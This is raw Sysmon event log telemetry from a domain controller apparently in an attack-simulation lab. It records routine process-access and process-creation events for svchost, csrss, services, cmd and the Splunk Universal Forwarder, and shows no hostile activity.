13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8EE3-6005-B100-00000000A301}41244184C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.321{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.076{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.084{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000003820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 